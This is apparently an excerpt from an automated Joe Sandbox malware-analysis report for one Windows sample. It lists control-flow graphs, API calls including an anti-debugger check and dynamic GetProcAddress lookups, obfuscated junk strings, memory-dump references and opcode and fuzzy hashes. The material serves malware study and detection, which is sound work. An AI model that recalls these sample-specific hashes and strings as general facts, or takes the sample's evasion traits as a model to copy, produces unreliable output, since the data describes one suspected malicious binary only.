                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$File$CommObject$CompareExchangeInformationInterlockedLengthNameOutputPathSearchWrite_calloc$AdjustmentAlarmAliasAliasesAllocAtomAttributeAttributesAuditBinaryCommandComputerConfigCopyCreateDefaultEnvironmentErrorExesFindFocusGlobalHandleLastLibraryLineLoadMaskModeModuleMovePipePrivilegePurgeReadSingleStringsSystemTimeTypeUserVolumeWait_memset
                                                                                                                                                                • String ID: bahujijudunogikawatihohelujof$bopuwofebakuduwin$k`$msimg32.dll$mufolomeragakowubicigero$nemagutimebonefotekoneb$wapopasihe$}$
                                                                                                                                                                • API String ID: 2037564194-3937991245
                                                                                                                                                                • Opcode ID: eef48b8247302c0322d3fbbae5623de215b702bdd2c4af31e6665b7a0e185c6f
                                                                                                                                                                • Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
                                                                                                                                                                • Opcode Fuzzy Hash: eef48b8247302c0322d3fbbae5623de215b702bdd2c4af31e6665b7a0e185c6f
                                                                                                                                                                • Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 004015E1
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004015F6
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(004191C8), ref: 00401601
                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040161D
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00401624
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                • Opcode ID: 3ad909b6b90c4a483299f4efeb9858d1b2e2074a893f7fabd4685953e4977760
                                                                                                                                                                • Instruction ID: 217945b887690a3cba0a058b0b25a51199940e65b7871b73a09ffccea138bdfb
                                                                                                                                                                • Opcode Fuzzy Hash: 3ad909b6b90c4a483299f4efeb9858d1b2e2074a893f7fabd4685953e4977760
                                                                                                                                                                • Instruction Fuzzy Hash: 162199B8D01254DBC701EF69ED886C43BF4FB48314F10957AE928972A0E7B89981CF1E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 146 418860-41886c 147 41887c-418882 146->147 148 41886e-41887a BuildCommDCBA 146->148 149 41888c-418891 147->149 150 418884-418886 FreeEnvironmentStringsA 147->150 148->149 151 418893-418894 149->151 152 4188fc-418900 149->152 150->149 155 4188a0-4188bb call 418850 151->155 153 418902-41890c 152->153 154 418916-418919 152->154 153->154 158 4188f6-4188f9 155->158 159 4188bd-4188f0 GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 155->159 158->155 160 4188fb 158->160 159->158 160->152
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -$sibepeyedupucis
                                                                                                                                                                • API String ID: 2332831159-1718117500
                                                                                                                                                                • Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
                                                                                                                                                                • Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 161 418896-41889d 162 4188a0-4188bb call 418850 161->162 165 4188f6-4188f9 162->165 166 4188bd-4188f0 GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 162->166 165->162 167 4188fb-418900 165->167 166->165 169 418902-41890c 167->169 170 418916-418919 167->170 169->170
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -$sibepeyedupucis
                                                                                                                                                                • API String ID: 1414951042-1718117500
                                                                                                                                                                • Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
                                                                                                                                                                • Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 171 418920-418947 172 418949-418957 QueryDosDeviceA 171->172 173 41895d 171->173 172->173 174 418962 call 418820 173->174 175 418967-41896e 174->175 176 418970-418972 FreeEnvironmentStringsA 175->176 177 418978-41898d call 418860 175->177 176->177 180 4189a6-4189a9 177->180 181 41898f-4189a0 HeapDestroy GetNumaProcessorNode 177->181 182 4189ab call 401000 180->182 181->180 183 4189b0-4189b3 182->183
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(jutusenavocibiyaxunokubiyefet,?,00000000), ref: 00418957
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418991
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0
                                                                                                                                                                Strings
                                                                                                                                                                • jutusenavocibiyaxunokubiyefet, xrefs: 00418952
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID: jutusenavocibiyaxunokubiyefet
                                                                                                                                                                • API String ID: 4159173863-2484441926
                                                                                                                                                                • Opcode ID: 21989151b632421131f4c7c56f4fafae63309cca12e68fa528237de0856bc472
                                                                                                                                                                • Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
                                                                                                                                                                • Opcode Fuzzy Hash: 21989151b632421131f4c7c56f4fafae63309cca12e68fa528237de0856bc472
                                                                                                                                                                • Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 194 403501-40351c call 402324 call 4028f1 199 40353b-403553 call 40182d 194->199 200 40351e-403522 194->200 207 403555-403557 199->207 208 40358b-403597 call 40359c 199->208 200->199 202 403524 200->202 204 403527-403529 202->204 205 403533-40353a call 402369 204->205 206 40352b-403532 call 402d79 204->206 206->205 212 403573-403585 InterlockedIncrement 207->212 213 403559-403562 InterlockedDecrement 207->213 208->204 212->208 213->212 217 403564-40356a 213->217 217->212 218 40356c-403572 call 40100f 217->218 218->212
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 0040350D
                                                                                                                                                                  • Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
                                                                                                                                                                  • Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 0040352D
                                                                                                                                                                • __lock.LIBCMT ref: 0040353D
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040355A
                                                                                                                                                                • InterlockedIncrement.KERNEL32(021C2B00), ref: 00403585
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                                                • Opcode ID: 0aed7e7151ab4baf51f7dba04ff00e2176f7cb80eebcd4767136a58f638b6b27
                                                                                                                                                                • Instruction ID: c9b24788df6032b5e8d83d148620bdae6139370d5539738cc94659757c5284a0
                                                                                                                                                                • Opcode Fuzzy Hash: 0aed7e7151ab4baf51f7dba04ff00e2176f7cb80eebcd4767136a58f638b6b27
                                                                                                                                                                • Instruction Fuzzy Hash: C9018E32D41621BBCA11AF65AC4979E7B64BB00725F44813BE800B72E0C77C5E81DBCD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 221 40100f-401020 call 402324 224 401022-401029 221->224 225 401097-40109c call 402369 221->225 226 40102b-401043 call 40182d call 401860 224->226 227 40106e 224->227 239 401045-40104d call 401890 226->239 240 40104e-40105e call 401065 226->240 229 40106f-40107f HeapFree 227->229 229->225 232 401081-401096 call 40166e GetLastError call 40162c 229->232 232->225 239->240 240->225 246 401060-401063 240->246 246->229
                                                                                                                                                                APIs
                                                                                                                                                                • __lock.LIBCMT ref: 0040102D
                                                                                                                                                                  • Part of subcall function 0040182D: __mtinitlocknum.LIBCMT ref: 00401843
                                                                                                                                                                  • Part of subcall function 0040182D: __amsg_exit.LIBCMT ref: 0040184F
                                                                                                                                                                  • Part of subcall function 0040182D: EnterCriticalSection.KERNEL32(?,?,?,0040258D,00000004,0041A548,0000000C,004010B7,?,?,00000000), ref: 00401857
                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 00401038
                                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 00401047
                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,0041A4C0,0000000C,004028E2,00000000,?,00402BD8,?,00000001,?,?,004017B7,00000018,0041A528,0000000C), ref: 00401077
                                                                                                                                                                • GetLastError.KERNEL32(?,00402BD8,?,00000001,?,?,004017B7,00000018,0041A528,0000000C,00401848,?,?,?,0040258D,00000004), ref: 00401088
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                                                • Opcode ID: 96826c8bce20cf7747eed3c6d1812a17504a8492c0699d22cdc648d00a0bdf6b
                                                                                                                                                                • Instruction ID: d79da508b191636924feb9bb703fa05d08103c1c15f778b52bc5afb354a6ee72
                                                                                                                                                                • Opcode Fuzzy Hash: 96826c8bce20cf7747eed3c6d1812a17504a8492c0699d22cdc648d00a0bdf6b
                                                                                                                                                                • Instruction Fuzzy Hash: 23018672D01345AADF30BBB29C1AB9E7B64AF01764F10853FF544B65E1CB7C8A808A5D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 247 408484-408491 GetModuleHandleA 248 408493-4084a1 GetProcAddress 247->248 249 4084a8 247->249 248->249 251 4084a3-4084a7 248->251 252 408480-408483 249->252 253 40847b-40847f 249->253
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004040A0), ref: 00408489
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408499
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                                                                • Opcode ID: 785ef883bb071d89224ecbe7b56862408099ec01593bd5a08af74b78da1345b5
                                                                                                                                                                • Instruction ID: d89e428fcb06b5c873902683785430d8b2f812fdf6616deba67c602ba2f5fa64
                                                                                                                                                                • Opcode Fuzzy Hash: 785ef883bb071d89224ecbe7b56862408099ec01593bd5a08af74b78da1345b5
                                                                                                                                                                • Instruction Fuzzy Hash: 76F06D30A00A0AD2EF002BB0AD0A3AF7A74BB80716F9241A5D5C2B01C4DE3980B5825B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 255 408370-40837b 256 4083dc-4083ee call 407c61 255->256 257 40837d-408380 255->257 260 4083f3-4083f7 256->260 257->256 259 408382-408385 257->259 261 4083a0-4083a3 259->261 262 408387-40839f call 4081bb 259->262 264 4083c3-4083da call 407d51 261->264 265 4083a5-4083a8 261->265 264->260 265->264 268 4083aa-4083c1 call 408276 265->268 268->260
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                • Instruction ID: 90881730480e07db8bfbb96aa53543ddcb4327a5d8f2a223ca44fba9169e931e
                                                                                                                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                • Instruction Fuzzy Hash: FD11753200414EFBCF125E85DD41CEE3F22BF58754B58842AFE9865271DA3BC972AB85

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 272 403c6d-403c88 call 402324 call 4028f1 277 403c8a-403c8e 272->277 278 403cac-403cd5 call 40182d call 403c2f call 403cd7 272->278 277->278 280 403c90-403c95 call 4028f1 277->280 285 403c98-403c9a 278->285 280->285 287 403ca4-403cab call 402369 285->287 288 403c9c-403ca3 call 402d79 285->288 288->287
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 00403C79
                                                                                                                                                                  • Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
                                                                                                                                                                  • Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901
                                                                                                                                                                • __getptd.LIBCMT ref: 00403C90
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00403C9E
                                                                                                                                                                • __lock.LIBCMT ref: 00403CAE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                                                • Opcode ID: d1964fccce5ab0380f80ada0cc5861ce8dc2287240387a93fb18a9f4d0170a82
                                                                                                                                                                • Instruction ID: 2499cd3afa89d3b98fba8cf9bf6429c0b2f2ec4b7213c6cb13e6104a5384003f
                                                                                                                                                                • Opcode Fuzzy Hash: d1964fccce5ab0380f80ada0cc5861ce8dc2287240387a93fb18a9f4d0170a82
                                                                                                                                                                • Instruction Fuzzy Hash: 21F06233944700CAE711BF7A890A78977A47F00719F10813FE840F72D1CBBC9A019A5E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 295 418680-4187c0 GetModuleHandleW GetProcAddress
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1646373207-3916222277
                                                                                                                                                                • Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
                                                                                                                                                                • Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E